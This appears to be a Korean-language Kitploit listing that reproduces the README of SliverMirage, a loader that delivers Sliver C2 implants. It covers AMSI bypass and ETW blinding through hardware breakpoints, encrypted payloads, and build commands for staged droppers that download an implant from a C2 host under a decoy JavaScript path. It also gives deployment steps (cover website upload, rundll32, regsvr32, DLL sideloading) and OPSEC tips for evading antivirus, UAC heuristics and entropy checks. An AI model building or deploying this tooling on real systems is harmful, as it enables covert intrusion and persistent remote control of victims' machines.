Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SliverMirage — Sliver C2용 Crystal Palace PICO 로더 이중 계층 AMSI 우회, ETW 무력화, AES-256-CBC 암호화 페이로드, 6가지 전달 변형 | Kitploit
도구/GitHubGitHub/daniomass/slivermirage
ExploitationPost-ExploitationMalware AnalysisCommand and ControlBinary AnalysisRed TeamingPayload Development
GitHubdaniomass/slivermirage

SliverMirage

Sliver C2용 Crystal Palace PICO 로더 이중 계층 AMSI 우회, ETW 무력화, AES-256-CBC 암호화 페이로드, 6가지 전달 변형

저장소 보기
1545일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SliverMirage

CrystalSliver의 포크로, Crystal Palace PICO 로더를 확장하여 이중 계층 AMSI 우회, ETW 무력화, 그리고 Sliver C2용 6가지 전달 변형을 제공합니다.

기능

SliverMirage는 Crystal Palace PICO 가상화를 통해 Sliver 임플란트 DLL을 래핑한 다음, amsi.dll이나 ntdll.dll을 패치하지 않고 AMSI와 ETW를 무력화하는 로더를 통해 전달합니다.

우회 스택:

계층기법상세
AMSI L1CLR 문자열 손상LdrRegisterDllNotification이 clr.dll 로드를 가로채 CLR이 GetProcAddress를 호출하기 전에 .rdata의 AmsiScanBuffer를 손상시킵니다
AMSI L2VEH + HWBPAmsiScanBuffer에 대한 Vectored Exception Handler가 E_INVALIDARG를 반환합니다
ETWHWBPNtTraceControl에 DR1 설정, STATUS_SUCCESS 반환
PayloadAES-256-CBC + XORBCrypt 복호화, VirtualAlloc(RW) -> VirtualProtect(RX), RWX 없음
VirtualizationCrystal Palace PICOSliver DLL이 PICO 프로세스 내에서 실행되어 사용자랜드 AV에 보이지 않음

변형

Staged 변형은 런타임에 Sliver HTTPS 웹사이트에서 암호화된 PICO를 다운로드합니다. EXE/DLL은 작으며(~20KB) 디스크에 페이로드를 포함하지 않습니다.

Stageless 변형은 컴파일 타임에 암호화된 PICO를 포함합니다(XOR + AES 이중 계층). 디스크 크기는 더 크지만 비콘 콜백 전에는 네트워크 활동이 전혀 없습니다.

빠른 시작

사전 요구 사항

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 (pefile 포함, pip install pefile)
  • openssl
  • Java 17 (Crystal Palace용 — build.sh가 자동으로 설치)

build.sh로 빌드 (권장)

빌드 스크립트는 누락된 의존성을 자동으로 프로비저닝하며(Crystal Palace 및 Java 17 포함) 전체 파이프라인을 처리합니다: DLL -> Crystal Palace PICO -> 암호화 -> 컴파일.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

옵션:

  • --dll <path> — Sliver 임플란트 DLL (필수)
  • --host <ip> — C2 서버 IP (staged 형식에 필수)
  • --port <port> — C2 포트 (기본값: 443)
  • --path <path> — 페이로드 다운로드 URL 경로 (기본값: /assets/js/vendor.js)
  • --format <fmt> — 출력 형식 (기본값: exe)
  • --export <name> — 사용자 지정 DLL 내보내기(export) 이름

Make로 빌드 (수동)

Crystal Palace PICO blob이 이미 있는 경우:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

배포

Staged (EXE 또는 DLL)

  1. build/payload.dat를 Sliver HTTPS 웹사이트에 업로드합니다:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. build/csvchelper.exe(또는 .dll)를 대상에 전달합니다.

Stageless

단일 파일 전달. C2 웹사이트 설정이 필요 없습니다.

DLL 실행 방법

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

또는 DLL 사이드로딩을 사용하십시오(대상 애플리케이션이 로드하는 합법적인 DLL과 일치하도록 이름 변경).

내보내기: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

프로젝트 구조

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

OPSEC 참고 사항

  • IAT는 깨끗함: kernel32, advapi32, bcrypt만 포함 — 모두 합법적인 Windows API
  • 메모리 패치 없음: AMSI/ETW 우회는 하드웨어 중단점을 사용하며 시스템 DLL에 VirtualProtect를 사용하지 않음
  • RWX 없음: 페이로드 메모리는 RW -> RX로 전환되며 절대 RWX가 아님
  • GUI 서브시스템: WinMain 진입점, -mwindows — 콘솔 창이 깜빡이지 않음
  • 버전 정보 + 매니페스트: 포함된 asInvoker 매니페스트가 UAC 휴리스틱을 억제함
  • 엔트로피 제어: stageless 페이로드는 XOR 롤링 키를 사용해 엔트로피를 ~7.8에서 ~6.0-6.5로 낮춤
  • 빌드 전에 resource.rc / resource_dll.rc를 사용자 지정 커버 신원으로 수정하세요

면책 조항

이 프로젝트는 승인된 보안 테스트, 연구 및 교육 목적으로만 사용해야 합니다. 침투 테스트를 수행할 수 있는 명시적 서면 허가가 있는 환경에서만 독점적으로 사용하십시오. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 이 소프트웨어의 오용에 대해 어떠한 책임도 지지 않습니다.

크레딧

  • Crystal Palace - Rasta Mouse 제작 — PICO 가상화 엔진
  • CrystalSliver — 원래 Crystal Palace + Sliver 통합
  • sRDI - Nick Landers 제작 — 셸코드 리플렉티브 DLL 인젝션 기법

라이선스

MIT

도구 다운로드
형식파일전달런타임 시 C2?
exeStaged EXEEXE + C2 웹사이트의 payload.dat예 (HTTPS)
exe-stagelessStageless EXE단일 EXE아니요
dllStageless DLL단일 DLL아니요
dll-stagedStaged DLLDLL + C2 웹사이트의 payload.dat예 (HTTPS)
shellcodeStaged shellcode.bin + C2 웹사이트의 payload.dat예 (HTTPS)
shellcode-stagelessStageless shellcode단일 .bin아니요